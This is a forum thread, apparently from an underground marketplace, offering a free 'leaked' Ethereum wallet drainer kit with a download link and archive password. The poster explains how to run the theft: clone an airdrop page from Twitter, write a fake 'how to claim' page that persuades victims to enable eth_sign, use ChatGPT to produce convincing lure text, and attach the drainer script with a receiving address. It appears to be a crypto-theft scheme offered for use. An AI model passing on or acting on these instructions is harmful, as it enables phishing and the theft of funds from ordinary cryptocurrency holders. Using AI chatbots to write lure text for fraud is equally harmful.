✨[leak] eth drainer free working 100% menu

Trade Details

Free

How does it work? (Learn more about CoreCoins here)

User Tag List

martacash's Avatar Member
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

✨[leak] eth drainer free working 100%

ETH SMASH 1.0 Silver Tier

Works for now but !!!WARNING!!! the token and NFT drainer not work or i think is outdated be careful

ETH DRAIN WORKS PERFECTLY BUT THE USER WHO WILL CONNECT TO THE SITE MUST HAVE ETH_SIGN ENABLED.. but I noticed that it's not a problem.. my advice is to create an html page to connect to the site like ''HOW TO CLAIM '' with all the details to enable it in a safe way.. on this the use of GPT CHAT is very useful to create a large and convincing text. in the .rar I also inserted my favorite program that is used to copy entire tamplates so you don't have to invent anything.. just connect the .js and the buttons and you're done.

another important thing I noticed that enabling eth_sign from mobile is much more practical and faster, both in terms of enabling and when the user will go to sign. do all your tests.

I recommend this combo because with the tool that copies the tamplates it's very simple to make a site. (I strongly recommend copying simple tamplates) just go to twitter and write ''airdrop'' billions of sites will come out from which you can take inspiration or copy. if you have a minimum of familiarity you can do everything in 10 minutes since the drainer only needs the ETH receiver.

i decided to release this version because i upgraded to the gold version. so i bought the ETH only version first and then i bought the working version for erc20 tokens

eth_smashing.jpg

eth-smash2.jpg

Use a proxysite if u cant download

anonfiles.com/o70bc52dzd/ETH_SMASH_rar

PW> ethdrainer
    Attached Thumbnails Attached Thumbnails ✨[leak] eth drainer free working 100%-eth-smashing-jpg  

✨[leak] eth drainer free working 100%
    Badboy1221's Avatar Member
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Cool love to know if is real

slotsys's Avatar Member